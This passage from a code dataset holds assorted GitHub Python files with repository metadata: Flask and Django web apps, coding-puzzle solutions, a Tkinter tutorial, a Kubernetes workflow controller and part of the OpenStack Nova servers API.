def _newTabRequest( self ):\n newTitle = self._requestTabName( \"Favs\" )\n if len(newTitle) < 1:\n return\n self.addFavGrp.emit( newTitle )\n\n def _renameTabRequest( self, tabIndex ):\n if tabIndex < 0:\n return\n oldTitle = self.tabText( tabIndex )\n newTitle = self._requestTabName(oldTitle)\n if not newTitle:\n # empty\n return\n self.renameFavGrp.emit( oldTitle, newTitle )\n\n def tabText(self, index):\n name = self.ui.data_tabs.tabText( index )\n name = name.replace(\"&\", \"\")\n return name\n\n def _requestTabName( self, currName ):\n newText, ok = QInputDialog.getText( self,\n \"Rename Fav Group\",\n \"Fav Group name:\",\n QLineEdit.Normal,\n currName )\n if newText in READONLY_FAV_GROUPS:\n return \"\"\n if ok and newText:\n # not empty\n return newText\n return \"\"\n\n def _renameTab(self, fromName, toName):\n tabIndex = self.findTabIndex( fromName )\n if tabIndex < 0:\n self.updateView()\n return\n tabWidget: SinglePageWidget = self.ui.data_tabs.widget( tabIndex )\n if tabWidget is None:\n self.updateView()\n return\n tabWidget.setData( self.dataObject, toName )\n tabBar = self.ui.data_tabs.tabBar()\n tabBar.setTabText( tabIndex, toName )\n","repo_name":"anetczuk/stock-monitor","sub_path":"src/stockmonitor/gui/widget/favswidget.py","file_name":"favswidget.py","file_ext":"py","file_size_in_byte":11504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27733355175","text":"from flask import Flask, request, jsonify, make_response\nfrom flask_sqlalchemy import SQLAlchemy\nfrom marshmallow import fields\nfrom marshmallow_sqlalchemy import ModelSchema\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://username:password@host:port/database-name'\ndb = SQLAlchemy(app)\n\n\n# Model\nclass User(db.Model):\n __tablename__ = \"users\"\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(20))\n\n def create(self):\n db.session.add(self)\n db.session.commit()\n return self\n\n def __init__(self, username):\n self.username = username\n\n def __repr__(self):\n return f\"{self.id}\"\n\n\ndb.create_all()\n\n\nclass UserSchema(ModelSchema):\n class Meta(ModelSchema.Meta):\n model = User\n sqla_session = db.session\n\n id = fields.Number(dump_only=True)\n username = fields.String(required=True)\n\n\n@app.route('/api/v1/username', methods=['GET'])\ndef index():\n get_users = User.query.all()\n user_schema = UserSchema(many=True)\n users = user_schema.dump(get_users)\n return make_response(jsonify({\"list users \": users}))\n\n\n@app.route('/api/v1/username/', methods=['GET'])\ndef get_user_by_id(id):\n get_user = User.query.get(id)\n user_schema = UserSchema()\n user = user_schema.dump(get_user)\n return make_response(jsonify({\"user \": user}))\n\n\n@app.route('/api/v1/username/', methods=['PUT'])\ndef update_user_by_id(id):\n data = request.get_json()\n get_user = User.query.get(id)\n if data.get('username'):\n get_user.username = data['username']\n db.session.add(get_user)\n db.session.commit()\n user_schema = UserSchema(only=['id', 'username'])\n user = user_schema.dump(get_user)\n return make_response(jsonify({\"user \": user}))\n\n\n@app.route('/api/v1/username/', methods=['DELETE'])\ndef delete_user_by_id(id):\n get_user = User.query.get(id)\n db.session.delete(get_user)\n db.session.commit()\n return make_response(\"\", 204)\n\n\n@app.route('/api/v1/username', methods=['POST'])\ndef create_todo():\n data = request.get_json()\n user_schema = UserSchema()\n user = user_schema.load(data)\n result = user_schema.dump(user.create())\n return make_response(jsonify({\"user \": result}), 200)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"laurohen/api-flask-mysql","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32477710780","text":"kniha = {\n 'nazev' : 'Babicka',\n 'autori' :[\n {\n 'krestni':'Bozena',\n 'prijmeni':'Nemcova',\n 'zije':False,\n },\n {\n 'krestni':'Jara',\n 'prijmeni':'Cimrman',\n 'zije':True,\n },\n ],\n 'pocet_vytisku':100,\n }\nprint(kniha['autori'])\n\nfor autor in kniha['autori']:\n cele_jmeno= autor['krestni']+' '+autor['prijmeni']\n print(cele_jmeno)\n","repo_name":"Nadaercz/Nadazkouska2010","sub_path":"SlovnikyCviceni2.py","file_name":"SlovnikyCviceni2.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26260787301","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'toys' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts INTEGER_ARRAY w as parameter.\n#\n\n\ndef toys(w):\n # Write your code here\n w = set(w)\n num = 0\n while len(w) > 0:\n num += 1\n m = min(w)\n w = w.difference(set(range(m, m+5)))\n return num\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input().strip())\n\n w = list(map(int, input().rstrip().split()))\n\n result = toys(w)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"Seungju182/Hackerrank","sub_path":"algorithms/priyanka-and-toys.py","file_name":"priyanka-and-toys.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38711949874","text":"# Create your views here.\nfrom django.shortcuts import render,redirect\nfrom django.contrib import messages\nfrom django.core import serializers\nfrom django.http import JsonResponse,HttpResponse\nfrom django.views import View\nfrom socials.models import *\nfrom django.db.models import Prefetch\nimport json\nfrom django.core.paginator import Paginator\n\n# Create your views here.\n#getting data in real time\nclass AjaxPost(View):\n #handling post request\n def post(self, request):\n #getting all the images sent by the user\n images = request.FILES.getlist('images')\n images = images[0:2]\n print(images)\n #gettting the text\n text = request.POST.get('text')\n print(request.user)\n #creating the post\n post = Post.objects.create(owner=request.user,content=text,title=text[0:5])\n for image in images:\n PostImage.objects.create(post=post, image=image)\n messages.success(request, 'created succesfully')\n return JsonResponse({'content': 'post created succesfully'}, status=200)\n\n\n\nclass ProductView(View):\n def post(self, request):\n images = request.FILES.getlist('images')\n three_images = images[0:3]\n image = images[0]\n details = request.POST.get('text')\n price = request.POST.get('price')\n title = request.POST.get('name')\n\n post = Post.objects.create(title=title,\n owner=request.user,\n content=details)\n\n for image in three_images:\n PostImage.objects.create(post=post, image=image)\n\n product = Product.objects.create(merchant=request.user,\n title=title,\n price=price,\n image=image,\n details=details,\n post=post)\n\n return redirect('market')\n\n def get(self,request):\n products = Product.objects.all()\n context = {\n 'products': products\n }\n return render(request,'socials/marketplace.html',context)\n\n\n\n \n\n\nclass LivePost(View):\n def post(self, request):\n data = json.loads(request.body)\n print(data)\n return JsonResponse({'content': 'done'})\n\nclass ImagePost(View):\n def get(self, request):\n images = PostImage.objects.all()\n return JsonResponse({'images':list(images.values())})\n\n#handling the pagination for the javascripts with my own pagination algorithm\ndef pagination_handler():\n posts = Post.objects.all()\n paginated_post = []\n while len(posts) !=0:\n paginated_post.append(posts[0:4])\n posts = posts[4:]\n print(paginated_post)\n return paginated_post\n\ndef check(request):\n page = request.session.get('page')\n return page\n\n\n# def PostView(request):\n# posts = Post.objects.all()\n# context = {\n# 'posts' : posts\n# }\n# if request.method == 'POST':\n# data = json.loads(request.body)\n# print(data)\n# return render(request,'socials/home.html',context)\n\n\n\n\n\nclass PostView(View):\n def get(self, request):\n print(request.user.id)\n posts = Post.objects.all()\n context = {\n 'posts' : posts\n }\n return render(request, 'socials/home.html',context)\n \n def post(self, request):\n posts = Post.objects.all()\n try:\n data = json.loads(request.body)\n id = data.get('id')\n text = data.get('text')\n post = Post.objects.get(id=id)\n comment = Comment.objects.create(post=post, \n owner=request.user,\n comment=text)\n comment.save()\n context = {\n 'posts' : posts\n }\n except:\n context = {\n 'posts' : posts\n }\n return redirect('home')\n \n \n\n \n \n \n \n\n\n\nclass IncrementLikeView(View):\n #handling post request for the like views\n def post(self, request):\n #converting the request.body from bytes to python native data types\n data = json.loads(request.body)\n post_id = data.get('id')\n post = Post.objects.get(id=post_id)\n try:\n like = Like.objects.get(post=post, user=request.user)\n if like:\n post.likes -= 1\n like.delete()\n post.save()\n except:\n like = Like.objects.create(post=post, user=request.user)\n post.likes += 1\n post.save()\n return JsonResponse({'content': 'like added succesfully','likes': post.likes}, status=200)\n\n\n\ndef postdetails(request,pk):\n post = Post.objects.get(id=pk)\n post_images = post.post_images.all()\n first_image = post_images[0].image.url\n comments = Comment.objects.filter(post=post.id)\n if request.method == 'POST':\n text = request.POST.get('text')\n comment = Comment.objects.create(owner=request.user, post=post, comment=text)\n context = {\n 'first_image': first_image,\n 'post_images': post_images,\n 'post': post,\n 'comments' : comments,\n }\n return render(request, 'socials/post_detail.html',context)\n\n\ndef Productdetails(request,pk):\n product = Product.objects.get(id=pk)\n context = {\n 'product': product\n }\n\n return render(request, 'socials/productdetail.html',context)\n\n\n\n\n\n\ndef uploadproduct(request):\n pass\n\ndef store(request, pk):\n return render(request, 'socials/store.html')\n\ndef chat(request):\n chats = Chat.objects.filter(owner=request.user)\n context = {\n 'chats': chats\n }\n return render(request,'socials/chat.html',context)\n\n\ndef chatdetail(request,pk):\n print(request.user)\n chat = Chat.objects.get(owner=request.user, receiver=pk)\n context = {\n 'chat': chat\n }\n return render(request, 'socials/chatdetail.html',context)","repo_name":"MictovicDev/UniportMall","sub_path":"socials/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31080460155","text":"class Solution:\n def minSubArrayLen(self, target: int, nums: List[int]) -> int:\n # [2,3,1,2,4,3] k = 7\n # |2|X |2,3|X |2,3,1|X |2,3,1,2| yes -> decrease the window\n # |3,1,2|X |3,1,2,4|yes |1,2,4|yes |2,4|nope |2,4,3| |4,3|\n \n \n total = 0\n count = len(nums)+1\n l,r = 0,0\n \n while l<=r and r=target:\n while l<=r and total>=target:\n count = min(count,r-l+1)\n if count==1:\n return 1\n total-=nums[l]\n l+=1\n \n r+=1\n \n return 0 if count==len(nums)+1 else count\n ","repo_name":"Merwan-J/competetive-programming","sub_path":"209-minimum-size-subarray-sum/209-minimum-size-subarray-sum.py","file_name":"209-minimum-size-subarray-sum.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5686026327","text":"def fib(n):\r\n # Base step\r\n if n == 0:\r\n return 0\r\n # Base step\r\n if n == 1:\r\n return 1\r\n # Recursive step\r\n if n >=2: \r\n return (fib(n - 1) + fib(n - 2))\r\n\r\n\r\nfor i in range(5+1):\r\n print(f\"fibonacci({i}) = {fib(i)}\")\r\n\r\n# fibonacci(0) = 0\r\n# fibonacci(1) = 1\r\n# fibonacci(2) = 1\r\n# fibonacci(3) = 2\r\n# fibonacci(4) = 3\r\n# fibonacci(5) = 5","repo_name":"AndreasSoularidis/medium_articles","sub_path":"Recursion/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"19981404632","text":"#!/usr/bin/python3\ndef fizzbuzz():\n i = 1\n while i <= 100:\n if i % 3 == 0:\n print('Fizz', end='')\n if i % 5 == 0:\n print('Buzz', end='')\n if i % 3 != 0 and i % 5 != 0:\n print('{:d}'.format(i), end='')\n print(\" \", end='')\n i = i + 1\n","repo_name":"humtej1204/holbertonschool-higher_level_programming","sub_path":"0x01-python-if_else_loops_functions/12-fizzbuzz.py","file_name":"12-fizzbuzz.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"69911456145","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.template import RequestContext, loader\nfrom django.core.urlresolvers import reverse\nfrom store.models import Item, Item_Qty, Size, User, Cart\nfrom django.contrib import messages\n\nDANGER = 50\n\ndef index(request):\n\t\titem_list = Item.objects.all()\n\t\tcontext = { 'items' : item_list }\n\t\treturn render(request, 'store/item.html', context)\n\ndef detail(request, item_id):\n\ttry:\n\t\t\tprofile = Item.objects.get(pk = item_id)\n\texcept Item_Profile.DoesNotExist:\n\t\traise Http404\n\toptions = Size.objects.all()\n\tfor o in options:\n\t\titem = Item_Qty.objects.filter(profile_id = item_id, size = o.id)\n\t\tif not item:\n\t\t\to.stat = 'disabled=\"disabled\"'\n\t\telse:\n\t\t\to.stat = ''\n\treturn render(request, 'store/item.html', {'profile' : profile, 'options' : options})\n\ndef add(request, item_id):\n\t\ti = get_object_or_404(Item, pk = item_id)\n\t\ttry:\n\t\t\titem = Item_Qty.objects.get(profile_id = item_id, size = request.POST['size'])\n\t\t\titem.quantity -= 1\n\t\t\titem.pending += 1\n\t\t\ttry:\n\t\t\t\tcheck = Cart.objects.get(item = item.id)\n\t\t\t\tcheck.qty +=1\n\t\t\t\tcheck.save()\n\t\t\texcept Cart.DoesNotExist:\n\t\t\t\tc = Cart(item = item.id, qty = 1)\n\t\t\t\tc.save()\n\t\t\titem.save()\n\t\t\tmessages.success(request, 'Item was added to your cart.')\n\t\texcept (KeyError, Item.DoesNotExist):\n\t\t\tmessages.warning(request, 'That item does not exist.')\n\t\treturn HttpResponseRedirect(reverse('store:index'))\n\ndef cart(request):\n\ttotal = 0\n\tsubtotal = 0\n\titems = Cart.objects.all()\n\tfor i in items:\n\t\tnum = []\n\t\tcount = 1\n\t\tinfo = Item_Qty.objects.get(id = i.item)\n\t\tnumber = info.quantity\n\t\tsize = Size.objects.get(id = info.size_id)\n\t\ti.size = size.size\n\t\tmore = Item.objects.get(id = info.profile_id)\n\t\ti.title = more.title\n\t\ti.price = more.price\n\t\ti.total = int(more.price) * int(i.qty)\n\t\tsubtotal += i.total\n\ttotal = subtotal + 10\n\treturn render(request, 'store/cart.html', {'items' : items, 'total' : total, 'subtotal' : subtotal})\n\n\ndef remove(request, item_id):\n\tqty = 0\n\titem = Cart.objects.get(item = item_id)\n\tqty = item.qty\n\tprofile = Item_Qty.objects.get(id = item_id)\n\tprofile.quantity += qty\n\tprofile.pending -= qty\n\tprofile.save()\n\titem.delete()\n\tmessages.warning(request, 'Item(s) have been removed from your cart')\n\treturn HttpResponseRedirect(reverse('store:cart'))","repo_name":"mthurin/Ninja-Cart","sub_path":"Ninja Cart/store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4287589406","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\n\n\nclass IrControl(models.Model):\n name = models.CharField(max_length=100, blank=True, default='')\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n # No crea relacion inversa, ya que ponemos related_name='+'\n owner = models.ForeignKey('auth.User', related_name='+', on_delete=models.CASCADE)\n\n def __str__(self):\n return self.name\n\n class Meta:\n ordering = ('name',)\n\n\nclass IrAction(models.Model):\n name = models.CharField(max_length=25)\n decode_type = models.IntegerField(default=0)\n address = models.IntegerField(default=0)\n value = models.FloatField(default=0)\n bits = models.IntegerField(default=0)\n rawlen = models.IntegerField(default=0)\n\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n control = models.ForeignKey('IrControl', on_delete=models.CASCADE,)\n\n def __str__(self):\n return self.name\n\n class Meta:\n ordering = ('name',)\n","repo_name":"edunola13/hibris-iot-core-api","sub_path":"apps/ir/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12361960660","text":"# https://www.pythontutorial.net/tkinter/tkinter-sizegrip/\n\"\"\"\nTkinter Sizegrip\nSummary: in this tutorial, you'll learn how to use the Tkinter Sizegrip widget that allows you to resize the entire\nappication window.\n\nIntroduction to the Tkinter Sizegrip widget\nThe Sizegrip widget typically locates in the bottom right corner of the window. It allows you to resize the enter\napplication window:\nTo create a Sizegrip widget, you use the following syntax:\n ttk.Sizegrip(parent, **option)\n\nTo make sure Sizegrip widget works properly, you need to make the root window resizable.\nIf you use the grid geometry manager, you need to configure column and row sizes.\n\nTkinter Sizegrip widget example\nThe following program displays a Sizegrip at the bottom right of the root window:\n\"\"\"\nimport tkinter as tk\nfrom tkinter import ttk\n\n\nclass App(tk.Tk):\n def __init__(self):\n super().__init__()\n\n self.title(\"Sizegrip demo\")\n self.geometry(\"300x200\")\n self.resizable(True, True)\n\n # grid layout\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n\n # create the sizegrip\n sg = ttk.Sizegrip(self)\n sg.grid(row=1, sticky=tk.SE)\n\n\nif __name__ == \"__main__\":\n app = App()\n app.mainloop()\n\n\"\"\"\nHow it works.\nFirst, make sure the root window resizable:\n self.resizable(True, True)\n \nSecond, configure the grid layout:\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n \nThird, create a Sizegrip widget:\n sg = ttk.Sizegrip(root)\n sg.grid(row=1, sticky=tk.SE)\n \nSummary\n+ Use the Tkinter Sizegrip widget to allow users to resize the entire window application.\n\"\"\"","repo_name":"julienPalleau/Tkinter","sub_path":"POOTkinter/TkinterSizegrip.py","file_name":"TkinterSizegrip.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2398983595","text":"# _*_ encoding:utf-8 _*_\n__author__ = 'xyx'\n__date__ = '2017-7-13 23:04'\n\nfrom django.conf.urls import url, include\n\nfrom .views import OrgView\n\nurlpatterns=[\n url(r'list/$',OrgView.as_view(), name='org_list'),\n]","repo_name":"124608760/muxueonline","sub_path":"apps/organization/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"38998063732","text":"from datetime import datetime\nfrom typing import Dict, List, Tuple, Set, Optional\n\nimport kubernetes\nimport networkx\n\nfrom src.workflow.constants import WorkflowConstants\nfrom src.workflow.status import WorkflowStatusEnum\nfrom src.workflow.workflow import Workflow\nfrom src.workflow.workflow_schema import WorkflowStepSchema, WorkflowSchema\n\n\nclass WorkflowController:\n __WORKFLOW_EXECUTED_STEPS_ANNOTATION__ = \"workflow-executed-steps\"\n __WORKFLOW_STARTED_STEPS_ANNOTATION__ = \"workflow-started-steps\"\n __STEP_SEPARATOR__ = ';'\n __EMPTY_EXECUTED_STEPS_STRING__ = ''\n\n STEP_EXECUTED_SELECTOR = f'metadata.annotations.{__WORKFLOW_EXECUTED_STEPS_ANNOTATION__}'\n\n @staticmethod\n def validate_workflow_spec(workflow_body: Dict) -> Tuple[bool, str]:\n try:\n graph = Workflow(WorkflowSchema(steps=WorkflowController.get_workflow_steps(workflow_body)))\n except (RuntimeError, KeyError) as e:\n return False, str(e)\n\n if not networkx.is_directed_acyclic_graph(graph):\n return False, \"Workflow contains a cycle!\"\n return True, \"\"\n\n @staticmethod\n def patch_workflow(patch: Dict, workflow_name: str, namespace: str) -> None:\n kubernetes.client.CustomObjectsApi().patch_namespaced_custom_object(\n body=patch,\n name=workflow_name,\n namespace=namespace,\n group=WorkflowConstants.GROUP,\n version=WorkflowConstants.API_VERSION,\n plural=WorkflowConstants.PLURAL\n )\n\n @staticmethod\n def get_workflow_steps(workflow_body: Dict) -> List[WorkflowStepSchema]:\n return [WorkflowStepSchema(**x) for x in workflow_body['spec']['containers']]\n\n @staticmethod\n def get_executed_steps(workflow_body: Dict) -> List[str]:\n executed_value = workflow_body['metadata']['annotations'][\n WorkflowController.__WORKFLOW_EXECUTED_STEPS_ANNOTATION__]\n if executed_value == WorkflowController.__EMPTY_EXECUTED_STEPS_STRING__:\n return []\n return executed_value.split(WorkflowController.__STEP_SEPARATOR__)\n\n @staticmethod\n def has_finished(workflow_body: Dict) -> bool:\n return len(WorkflowController.get_workflow_steps(workflow_body)) == len(\n WorkflowController.get_executed_steps(workflow_body))\n\n @staticmethod\n def add_executed_step(workflow_body: Dict, patch: Dict, step_name: str) -> None:\n steps = list(set(WorkflowController.get_executed_steps(workflow_body)).union({step_name}))\n patch.setdefault(\"metadata\", {}).setdefault(\"annotations\", {})[\n WorkflowController.__WORKFLOW_EXECUTED_STEPS_ANNOTATION__] = WorkflowController.__STEP_SEPARATOR__.join(\n steps)\n\n @staticmethod\n def init_executed_steps(workflow_body: Dict) -> None:\n workflow_body.setdefault(\"metadata\", {}).setdefault(\"annotations\", {})[\n WorkflowController.__WORKFLOW_EXECUTED_STEPS_ANNOTATION__] \\\n = WorkflowController.__EMPTY_EXECUTED_STEPS_STRING__\n workflow_body.setdefault(\"metadata\", {}).setdefault(\"annotations\", {})[\n WorkflowController.__WORKFLOW_STARTED_STEPS_ANNOTATION__] \\\n = WorkflowController.__EMPTY_EXECUTED_STEPS_STRING__\n\n @staticmethod\n def add_to_started_steps(workflow_body: Dict, patch: Dict, new_started: List[str]) -> None:\n started = set(WorkflowController.__get_already_started_steps(workflow_body)).union(set(new_started))\n patch.setdefault(\"metadata\", {}).setdefault(\"annotations\", {})[\n WorkflowController.__WORKFLOW_STARTED_STEPS_ANNOTATION__] = \\\n WorkflowController.__STEP_SEPARATOR__.join(started)\n\n @staticmethod\n def get_steps_to_execute(workflow_body, executed_steps: List[str]) -> Set[WorkflowStepSchema]:\n steps = Workflow(WorkflowSchema(steps=WorkflowController.get_workflow_steps(workflow_body))) \\\n .get_next_to_execute(set(executed_steps))\n already_started = WorkflowController.__get_already_started_steps(workflow_body)\n return set([s for s in steps if s.stepName not in already_started])\n\n @staticmethod\n def update_status(workflow_body: Dict, status: WorkflowStatusEnum, message=Optional[str]) -> None:\n workflow_body['status'] = {\n 'workflow-status': str(status),\n 'status-changed': str(datetime.now()),\n 'message': str(message)\n }\n\n @staticmethod\n def get_status(workflow_body: Dict) -> WorkflowStatusEnum:\n return WorkflowStatusEnum.from_string(workflow_body['status']['workflow-status'])\n\n @staticmethod\n def get_status_timestamp(workflow_body: Dict):\n return datetime.fromisoformat(workflow_body['status']['status-changed'])\n\n @staticmethod\n def get_max_step_timeout(workflow_body: Dict) -> int:\n return workflow_body['spec']['maxStepTimeout']\n\n @staticmethod\n def __get_already_started_steps(workflow_body: Dict) -> List[str]:\n in_progress = workflow_body['metadata']['annotations'][\n WorkflowController.__WORKFLOW_STARTED_STEPS_ANNOTATION__]\n if in_progress == WorkflowController.__EMPTY_EXECUTED_STEPS_STRING__:\n return []\n return in_progress.split(WorkflowController.__STEP_SEPARATOR__)\n","repo_name":"tc360950/k8_workflow_operator","sub_path":"src/workflow/workflow_controller.py","file_name":"workflow_controller.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13966128706","text":"import streamlit as st\nimport controllers.material_controllers as material_controllers\nimport models.material as material\n\n# Criando o formulário para o material\ndef criar():\n\n id_alteracao = st.experimental_get_query_params()\n st.experimental_set_query_params()\n material_recuperado = None\n\n if id_alteracao.get(\"id\") != None:\n id_alteracao = id_alteracao.get(\"id\")[0]\n material_recuperado = material_controllers.selecionar_id(id_alteracao)\n #Talvez tenha uma erro aqui quando por conta do id\n st.experimental_set_query_params(id=[material_recuperado.id])\n st.title(\"Alterar material\")\n else:\n st.title(\"Incluir\")\n\n st.subheader(\"Incluir Material\")\n with st.form(key = \"Armazenar_material\"):\n if material_recuperado == None:\n input_nome = st.text_input(label=\"Insira seu nome:\")\n input_valor = st.number_input(label=\"Insira o valor:\",format=\"%2f\", step=1.0)\n else:\n input_nome = st.text_input(label=\"Insira seu nome:\",value=material_recuperado.nome)\n input_valor = st.number_input(label=\"Insira o valor:\",format=\"%2f\", step=1.0,value=material_recuperado.valor)\n input_botão_enviar = st.form_submit_button(\"Enviar\")\n\n\n if input_botão_enviar:\n if material_recuperado == None:\n material_controllers.inserir(material.Material(0, input_nome,input_valor))\n st.success(\"Material incluido com sucesso !!\")\n else:\n st.experimental_set_query_params()\n material_controllers.alterar(material.Material(0, input_nome,input_valor))\n st.success(\"Material alterado com sucesso !!\")","repo_name":"Rafadrodrigues/CRUD_Python_MySQL","sub_path":"pages/Material/incluir.py","file_name":"incluir.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28560040517","text":"import base64\nimport re\nimport sys\n\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nimport oslo_messaging as messaging\nfrom oslo_utils import netutils\nfrom oslo_utils import strutils\nfrom oslo_utils import timeutils\nfrom oslo_utils import uuidutils\nimport six\nimport webob\nfrom webob import exc\n\nfrom nova.api.openstack import common\nfrom nova.api.openstack.compute.views import servers as views_servers\nfrom nova.api.openstack import wsgi\nfrom nova import block_device\nfrom nova import compute\nfrom nova.compute import flavors\nfrom nova import exception\nfrom nova.i18n import _\nfrom nova import objects\nfrom nova import policy\nfrom nova import utils\n\n\nserver_opts = [\n cfg.BoolOpt('enable_instance_password',\n default=True,\n help='Enables returning of the instance password by the'\n ' relevant server API calls such as create, rebuild'\n ' or rescue, If the hypervisor does not support'\n ' password injection then the password returned will'\n ' not be correct'),\n]\nCONF = cfg.CONF\nCONF.register_opts(server_opts)\nCONF.import_opt('reclaim_instance_interval', 'nova.compute.manager')\n\nLOG = logging.getLogger(__name__)\n\nCREATE_EXCEPTIONS = {\n exception.InvalidMetadataSize: exc.HTTPRequestEntityTooLarge,\n exception.ImageNotFound: exc.HTTPBadRequest,\n exception.FlavorNotFound: exc.HTTPBadRequest,\n exception.KeypairNotFound: exc.HTTPBadRequest,\n exception.ConfigDriveInvalidValue: exc.HTTPBadRequest,\n exception.ImageNotActive: exc.HTTPBadRequest,\n exception.FlavorDiskTooSmall: exc.HTTPBadRequest,\n exception.FlavorMemoryTooSmall: exc.HTTPBadRequest,\n exception.NetworkNotFound: exc.HTTPBadRequest,\n exception.PortNotFound: exc.HTTPBadRequest,\n exception.FixedIpAlreadyInUse: exc.HTTPBadRequest,\n exception.SecurityGroupNotFound: exc.HTTPBadRequest,\n exception.InstanceUserDataTooLarge: exc.HTTPBadRequest,\n exception.InstanceUserDataMalformed: exc.HTTPBadRequest,\n exception.ImageNUMATopologyIncomplete: exc.HTTPBadRequest,\n exception.ImageNUMATopologyForbidden: exc.HTTPBadRequest,\n exception.ImageNUMATopologyAsymmetric: exc.HTTPBadRequest,\n exception.ImageNUMATopologyCPUOutOfRange: exc.HTTPBadRequest,\n exception.ImageNUMATopologyCPUDuplicates: exc.HTTPBadRequest,\n exception.ImageNUMATopologyCPUsUnassigned: exc.HTTPBadRequest,\n exception.ImageNUMATopologyMemoryOutOfRange: exc.HTTPBadRequest,\n exception.PortInUse: exc.HTTPConflict,\n exception.InstanceExists: exc.HTTPConflict,\n exception.NoUniqueMatch: exc.HTTPConflict,\n exception.Invalid: exc.HTTPBadRequest,\n exception.InstanceGroupNotFound: exc.HTTPBadRequest,\n}\n\nCREATE_EXCEPTIONS_MSGS = {\n exception.ImageNotFound: _(\"Can not find requested image\"),\n exception.FlavorNotFound: _(\"Invalid flavorRef provided.\"),\n exception.KeypairNotFound: _(\"Invalid key_name provided.\"),\n exception.ConfigDriveInvalidValue: _(\"Invalid config_drive provided.\"),\n}\n\n\nclass Controller(wsgi.Controller):\n \"\"\"The Server API base controller class for the OpenStack API.\"\"\"\n\n _view_builder_class = views_servers.ViewBuilder\n\n @staticmethod\n def _add_location(robj):\n # Just in case...\n if 'server' not in robj.obj:\n return robj\n\n link = [l for l in robj.obj['server']['links'] if l['rel'] == 'self']\n if link:\n robj['Location'] = utils.utf8(link[0]['href'])\n\n # Convenience return\n return robj\n\n def __init__(self, ext_mgr=None, **kwargs):\n super(Controller, self).__init__(**kwargs)\n self.compute_api = compute.API()\n self.ext_mgr = ext_mgr\n\n def index(self, req):\n \"\"\"Returns a list of server names and ids for a given user.\"\"\"\n try:\n servers = self._get_servers(req, is_detail=False)\n except exception.Invalid as err:\n raise exc.HTTPBadRequest(explanation=err.format_message())\n return servers\n\n def detail(self, req):\n \"\"\"Returns a list of server details for a given user.\"\"\"\n try:\n servers = self._get_servers(req, is_detail=True)\n except exception.Invalid as err:\n raise exc.HTTPBadRequest(explanation=err.format_message())\n return servers\n\n def _get_servers(self, req, is_detail):\n \"\"\"Returns a list of servers, based on any search options specified.\"\"\"\n\n search_opts = {}\n search_opts.update(req.GET)\n\n context = req.environ['nova.context']\n remove_invalid_options(context, search_opts,\n self._get_server_search_options())\n\n # Verify search by 'status' contains a valid status.\n # Convert it to filter by vm_state or task_state for compute_api.\n search_opts.pop('status', None)\n if 'status' in req.GET.keys():\n statuses = req.GET.getall('status')\n states = common.task_and_vm_state_from_status(statuses)\n vm_state, task_state = states\n if not vm_state and not task_state:\n return {'servers': []}\n search_opts['vm_state'] = vm_state\n # When we search by vm state, task state will return 'default'.\n # So we don't need task_state search_opt.\n if 'default' not in task_state:\n search_opts['task_state'] = task_state\n\n if 'changes-since' in search_opts:\n try:\n parsed = timeutils.parse_isotime(search_opts['changes-since'])\n except ValueError:\n msg = _('Invalid changes-since value')\n raise exc.HTTPBadRequest(explanation=msg)\n search_opts['changes-since'] = parsed\n\n # By default, compute's get_all() will return deleted instances.\n # If an admin hasn't specified a 'deleted' search option, we need\n # to filter out deleted instances by setting the filter ourselves.\n # ... Unless 'changes-since' is specified, because 